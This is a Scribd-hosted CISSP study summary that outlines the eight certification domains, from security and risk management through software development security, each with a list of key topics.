0% found this document useful (0 votes)
42 views4 pages

Cissp Summary

The document outlines key domains of security and risk management, including foundational concepts, asset security, security architecture, network security, identity management, security assessment, operations, and software development security. Each domain encompasses critical topics such as risk assessment, secure design principles, authentication methods, incident response, and secure coding practices. The focus is on ensuring comprehensive security measures throughout the lifecycle of information and systems.
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
42 views4 pages

Cissp Summary

The document outlines key domains of security and risk management, including foundational concepts, asset security, security architecture, network security, identity management, security assessment, operations, and software development security. Each domain encompasses critical topics such as risk assessment, secure design principles, authentication methods, incident response, and secure coding practices. The focus is on ensuring comprehensive security measures throughout the lifecycle of information and systems.
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
You are on page 1/ 4

1.

Security and Risk Management

Focuses on the foundational concepts of security, risk, compliance, and


governance.

 Key Topics:

o Confidentiality, Integrity, and Availability (CIA Triad)

o Security Governance and Risk Management

o Compliance and Legal/Regulatory Issues

o Risk Assessment and Risk Management

o Threat Modeling

o Business Continuity (BC) and Disaster Recovery Planning


(DRP)

o Ethics and Professional Standards (e.g., (ISC)² Code of Ethics)

o Security Policies, Standards, Procedures, and Guidelines

2. Asset Security

Covers the management and protection of organizational assets


throughout their lifecycle.

 Key Topics:

o Classification and Ownership of Information and Assets

o Data Retention Policies

o Secure Data Handling and Disposal

o Privacy Protection

o Data Security Controls

o Storage and Media Security

3. Security Architecture and Engineering

Focuses on designing and implementing secure systems and


architectures.

 Key Topics:
o Secure Design Principles (e.g., Defense in Depth, Least
Privilege)

o Security Models (e.g., Bell-LaPadula, Biba, Clark-Wilson)

o Cryptography Basics (encryption, hashing, digital signatures)

o Secure Hardware, Software, and Firmware Design

o Vulnerabilities and Countermeasures

o Security Architecture Frameworks

o Physical Security Design and Controls

4. Communication and Network Security

Addresses the design, implementation, and management of secure


communication systems and networks.

 Key Topics:

o Network Protocols and Architecture

o Secure Network Design and Segmentation

o Wireless Network Security

o Remote Access and VPNs

o Network Attacks and Countermeasures

o Firewalls, IDS/IPS, and NAC

o Secure Communication Protocols (e.g., TLS, IPsec)

5. Identity and Access Management (IAM)

Focuses on ensuring proper identification, authentication, and


authorization mechanisms.

 Key Topics:

o Identity Management Concepts

o Authentication Methods (e.g., passwords, biometrics, MFA)

o Access Control Models (e.g., Role-Based Access Control)

o Federated Identity Management (e.g., SSO, OAuth)

o Account and Credential Management


o Privileged Access Management (PAM)

o Identity as a Service (IDaaS)

6. Security Assessment and Testing

Covers techniques to ensure that systems are secure and operating as


intended.

 Key Topics:

o Security Assessment and Audit Techniques

o Vulnerability Management and Penetration Testing

o Security Testing Tools and Techniques

o Log Management and Analysis

o Reporting and Documentation of Assessment Results

o Continuous Monitoring and Metrics

7. Security Operations

Addresses operational security and incident response.

 Key Topics:

o Incident Response Lifecycle

o Security Operations Center (SOC) and Threat Intelligence

o Forensics and Evidence Collection

o Logging and Monitoring

o Patch Management and Change Control

o Disaster Recovery and Business Continuity Operations

o Personnel Safety and Security (e.g., evacuation procedures)

8. Software Development Security

Focuses on securing applications and software development processes.

 Key Topics:
o Software Development Life Cycle (SDLC) and Security
Integration

o Secure Coding Practices

o Application Security Testing (e.g., SAST, DAST)

o Vulnerabilities in Web Applications (e.g., SQL Injection, XSS)

o APIs and Microservices Security

o DevSecOps Practices

o Secure Software Environments and Tools

You might also like